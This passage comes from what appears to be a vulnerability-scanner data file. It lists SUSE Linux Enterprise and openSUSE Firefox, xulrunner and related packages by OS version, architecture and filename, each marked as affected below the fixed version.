"MozillaFirefox-debugsource-3.5.8-0.1.1.ppc64.rpm", "packageName": "MozillaFirefox-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.5.8-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.4.1.s390x.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "3.0.18-0.1", "arch": "ppc", "packageFilename": "MozillaFirefox-debuginfo-3.0.18-0.1.ppc.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.4.1.i586.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.4.1.ia64.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-debuginfo-1.9.1.8-1.4.1.ppc.rpm", "packageName": "mozilla-xulrunner191-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "3.5.8-0.3", "arch": "ppc", "packageFilename": "MozillaFirefox-debuginfo-3.5.8-0.3.ppc.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "s390x", "packageFilename": "MozillaFirefox-debuginfo-3.5.8-0.1.1.s390x.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-gnomevfs-64bit-1.9.0.18-0.1.ppc.rpm", "packageName": "mozilla-xulrunner190-gnomevfs-64bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "3.5.8-0.4.1", "arch": "ppc", "packageFilename": "MozillaFirefox-branding-upstream-3.5.8-0.4.1.ppc.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.i586.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.1.ppc.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "3.5.8-0.3", "arch": "ia64", "packageFilename": "MozillaFirefox-branding-upstream-3.5.8-0.3.ia64.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.5.8-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-debugsource-3.5.8-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.1.1.ia64.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "3.5.8-0.3", "arch": "i586", "packageFilename": "MozillaFirefox-debuginfo-3.5.8-0.3.i586.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "3.0.18-0.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-3.0.18-0.1.i586.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.4.1.s390x.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.5.8-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-common-3.5.8-0.1.1.i586.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-3.5.8-0.1.1.i586.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.4.1.ppc.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-translations-32bit-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-debugsource-1.9.0.18-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner190-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-debuginfo-1.9.1.8-1.4.1.ia64.rpm", "packageName": "mozilla-xulrunner191-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-1.9.1.8-1.4.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "3.5.8-0.3", "arch": "i586", "packageFilename": "MozillaFirefox-3.5.8-0.3.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.1.1.ia64.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.4.1.ia64.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.4.1.ppc.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-1.9.1.8-1.4.1.ia64.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-debuginfo-1.9.1.8-1.4.1.i586.rpm", "packageName": "mozilla-xulrunner191-debuginfo", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "3.5.8-0.3", "arch": "s390x", "packageFilename": "MozillaFirefox-branding-upstream-3.5.8-0.3.s390x.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-other-1.9.1.8-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.18-0.1.1", "arch": "ppc", "packageFilename": "MozillaFirefox-debugsource-3.0.18-0.1.1.ppc.rpm", "packageName": "MozillaFirefox-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "0.6-0.1.2", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-kde4-0.6-0.1.2.x86_64.rpm", "packageName": "mozilla-xulrunner191-kde4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-debuginfo-1.9.1.8-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-1.9.1.8-1.1.1.s390x.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner191-1.9.1.8-1.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner191-gnomevfs-32bit-1.9.1.8-1.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "ppc", "packageFilename": "python-xpcom190-1.9.0.18-0.4.1.ppc.rpm", "packageName": "python-xpcom190", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "0.6-0.1.2", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-kde4-debuginfo-0.6-0.1.2.x86_64.rpm", "packageName": "mozilla-xulrunner191-kde4-debuginfo", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "python-xpcom190-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "python-xpcom190", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.18-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-debuginfo-3.0.18-0.1.1.i586.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-gnomevfs-32bit-1.9.1.8-1.4.1.s390x.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.8-1.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.4.1.s390x.rpm", "packageName": "mozilla-xulrunner190-gnomevfs-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-debugsource-1.9.0.18-0.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-debugsource", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "3.5.8-0.3", "arch": "ppc", "packageFilename": "MozillaFirefox-branding-upstream-3.5.8-0.3.ppc.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-1.9.1.8-1.4.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-debugsource-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.8-1.4.1.ppc.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "3.0.18-0.1", "arch": "ppc", "packageFilename": "MozillaFirefox-3.0.18-0.1.ppc.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-translations-32bit-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.5.8-0.4.1", "arch": "ia64", "packageFilename": "MozillaFirefox-3.5.8-0.4.1.ia64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "python-xpcom190-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "python-xpcom190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.4.1.ia64.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.4.1.ppc.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-debuginfo-1.9.1.8-1.1.1.ia64.rpm", "packageName": "mozilla-xulrunner191-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "python-xpcom191-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "i586", "packageFilename": "python-xpcom191-1.9.1.8-1.4.1.i586.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "s390x", "packageFilename": "python-xpcom191-1.9.1.8-1.4.1.s390x.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-translations-32bit-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-debuginfo-1.9.1.8-1.4.1.s390x.rpm", "packageName": "mozilla-xulrunner191-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.5.8-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-debuginfo-3.5.8-0.1.1.i586.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "3.5.8-0.4.1", "arch": "ia64", "packageFilename": "MozillaFirefox-branding-upstream-3.5.8-0.4.1.ia64.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.5.8-0.4.1", "arch": "s390x", "packageFilename": "MozillaFirefox-translations-3.5.8-0.4.1.s390x.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-debugsource-1.9.0.18-0.1.1.s390x.rpm", "packageName": "mozilla-xulrunner190-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "ia64", "packageFilename": "MozillaFirefox-debugsource-3.5.8-0.1.1.ia64.rpm", "packageName": "MozillaFirefox-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.3-0.1.1", "arch": "x86_64", "packageFilename": "seamonkey-irc-2.0.3-0.1.1.x86_64.rpm", "packageName": "seamonkey-irc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-1.4.1.ia64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.5.8-0.4.1", "arch": "ppc", "packageFilename": "MozillaFirefox-3.5.8-0.4.1.ppc.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.18-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-debugsource-3.0.18-0.1.1.i586.rpm", "packageName": "MozillaFirefox-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-gnomevfs-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-debugsource-1.9.0.18-0.1.1.ia64.rpm", "packageName": "mozilla-xulrunner190-debugsource", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.4.1.i586.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-translations-32bit-1.9.0.18-0.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-debuginfo-32bit-1.9.0.18-0.1.1.s390x.rpm", "packageName": "mozilla-xulrunner190-debuginfo-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-translations-1.9.1.8-1.1.1.ia64.rpm", "packageName": "mozilla-xulrunner191-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-1.4.1.i586.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-32bit-1.9.0.18-0.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "3.0.18-0.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.0.18-0.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "0.6-0.1.2", "arch": "i586", "packageFilename": "mozilla-xulrunner191-kde4-debuginfo-0.6-0.1.2.i586.rpm", "packageName": "mozilla-xulrunner191-kde4-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.4.1.i586.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-64bit-1.9.0.18-0.1.ppc.rpm", "packageName": "mozilla-xulrunner190-64bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.1.x86_64.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "3.5.8-0.3", "arch": "ia64", "packageFilename": "MozillaFirefox-translations-3.5.8-0.3.ia64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.5.8-0.4.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-3.5.8-0.4.1.i586.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-1.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-debuginfo-1.9.1.8-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-debuginfo-1.9.1.8-1.4.1.ppc.rpm", "packageName": "mozilla-xulrunner191-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": 